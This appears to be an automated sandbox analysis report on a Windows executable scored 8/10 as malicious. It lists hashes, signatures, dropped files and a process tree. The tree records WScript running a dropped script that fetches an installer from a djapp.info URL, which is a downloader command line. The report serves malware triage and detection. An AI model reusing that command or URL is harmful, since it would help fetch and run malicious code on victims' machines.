Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    26/05/2024, 03:17

General

  • Target

    742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    742be332927d3c9215c11e47cefd0e51

  • SHA1

    6571a761199ad23e12185dbae9f21e6136bf8342

  • SHA256

    065183bc01f4117eea2408f6625a9b0d238fec9f251d2538b02abaacd2cf7106

  • SHA512

    8c249cd46c4b63f876a9b22f1c96d061c542070bc35cc1cc460e432601d245a573fcce2595240f295e90c11b71056a016bc7305fd47b2de9710bdbdef65700ea

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3w:/7BSH8zUB+nGESaaRvoB7FJNndn1

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2004
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2356
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2668
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:1892
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2092

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          1KB

          MD5

          dd3850d9ce5a33ba453ba4d1dfb4ba51

          SHA1

          df05b044dd14e7d009aad0398686bbfd6fff1491

          SHA256

          e9e041a83d7f3dbd6adfeda50b7ff9d3fd1abfcfb4fc5906d481c33db7072b85

          SHA512

          ec27ccc61d0133a76a612d5ddde2c6193f96302e17f66a75da8e1ad18ee871fe6b307e535317726449dc724331d4f48376d03201ad8d9dc2985aa0420d45b8e4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          724B

          MD5

          8202a1cd02e7d69597995cabbe881a12

          SHA1

          8858d9d934b7aa9330ee73de6c476acf19929ff6

          SHA256

          58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

          SHA512

          97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          410B

          MD5

          69e8173ede06b40a095a6207332d260c

          SHA1

          c2749497e8506e99a085d1a7f4a80fa2235d4fcb

          SHA256

          7c505b7e44fe709d6b9e55e1a5d09025cd3962a169be97acceb82929ee894e81

          SHA512

          9b4df2d82d0908a12d35190b14374887077c98255963d3b899cf40bf067591c9d4420ee5ee28b075edd878bd52fd6c164ea8f4c9003fc1fb35715131d9613c7a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          1dc7afbaabfb27af8ce2ce784ee375e8

          SHA1

          3ab47a21e10ed815f7d6a74e03337886976537ac

          SHA256

          31d9ffc822d6c77e6665a1d97a416a2602a9e1e775f32ade75ecc3eee3557c9e

          SHA512

          895a778711bc16573215e3293f3aa21bda52c1599cb3719b520bdf9053e00d8f2b2e2058bf4ee97c1693e4b79d7103f666e06b96f143aece19320eb2e45dc5f4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          392B

          MD5

          f42a12f1f39fc7b984c8aff5dc07cbe7

          SHA1

          b76b8cd52a1a4add8f504fd2310c34d0a7157754

          SHA256

          2d043bb14d90baa75356a46ef039c8f5b975d6ad2317040bb686f69514ddd0a7

          SHA512

          10a68fb9b8361bd764c7a7b5cced12c15bdab34137b0d40e5bbf8ef56e9c95785e5db7b70e6a48d9e5efce26c4aebb02181075a5a28a65da799864d806e03b62

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

          Filesize

          6KB

          MD5

          9f2bc8cac28bc3b78936c1715e6b404a

          SHA1

          569dc5054683f2cac6fa4fd2819e2553f51c5b02

          SHA256

          8051ca3b8366cf7884f9c88cbb4a9605e0c189b4f2d7eb6a48cfde8f9f457b88

          SHA512

          b24d6a99966e5d2c355420e03d5e5c601fafc4c70a68edb6158a8b948e7e1993a35a03ff2101b007eac247c2de8732621ea656907571a530054477357748f44d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

          Filesize

          40KB

          MD5

          63dec8725452b8b20569682997eea84f

          SHA1

          9ab34d2f2a58212c7618b8248abbb843c554037c

          SHA256

          221ebeba1fb201dbceb1258da93f159cdff75ff3e4bd1c77f09ab64410212a70

          SHA512

          35228957e0c0867629afb473846b7c405416e02f2b65e87853909b8b96458cefd2b9d373ab3109c16005c70581741e136771c24ba3c3324a02a6b769c169c695

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

          Filesize

          40KB

          MD5

          4111118421f57b050e46ceccf8b6ced0

          SHA1

          76d92b74fbf5f6c1d39d97a96a8d71ddacd5ad3c

          SHA256

          34f0d697d6eb41be89e722c651e9a0ecf00307f64969388b164fdcdd8038dfa8

          SHA512

          f59b0a141a5020683a9850477a07b183ec40792f01b8d6be6fe92d54bc47b9d3a137a552dbb6a4db0e74e19389257d4d367f963a4552fa64b4f68181daa3493a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

          Filesize

          40KB

          MD5

          cd853adc85a57676032ca5b5b534eb55

          SHA1

          a896642fb6a2ffee080bf03eb68944f746a56801

          SHA256

          04cba2319204665ddc2b3927c8869b555ca8f4f85d673e2940c80ab0b810f0bf

          SHA512

          f9cdd008e4955902f2241cf30ecc5843da88e3e2f6577c8e882fa264f1691b21aeab3fe9cd83f442c4e544a6fee17e6ebf6e333d0f7a012eb73b1a8da9594b41

        • C:\Users\Admin\AppData\Local\Temp\Cab405A.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Users\Admin\AppData\Local\Temp\Tar58CB.tmp

          Filesize

          171KB

          MD5

          9c0c641c06238516f27941aa1166d427

          SHA1

          64cd549fb8cf014fcd9312aa7a5b023847b6c977

          SHA256

          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

          SHA512

          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        • C:\Users\Admin\AppData\Local\Temp\fuf1130.js

          Filesize

          3KB

          MD5

          3813cab188d1de6f92f8b82c2059991b

          SHA1

          4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

          SHA256

          a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

          SHA512

          83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PPA2MUFY.txt

          Filesize

          177B

          MD5

          aace5e9bfbc63533e58680ab3e35717e

          SHA1

          6eb451ad9a44b0ac552891a88b7f9bf3b194cc2a

          SHA256

          dc05c230bd0c5fefebbd9e3c121fa4ad611e3bf5aa344e570d9fa7ad61fda3e5

          SHA512

          c2813c67e03f374b48c6eb2f737cb5b6bcf7025a3b8a061ab10e4bb423755cbfd77d3fce17c4f44a57f892891959a1bf9957239ee43eb119c9c7ded3c487af35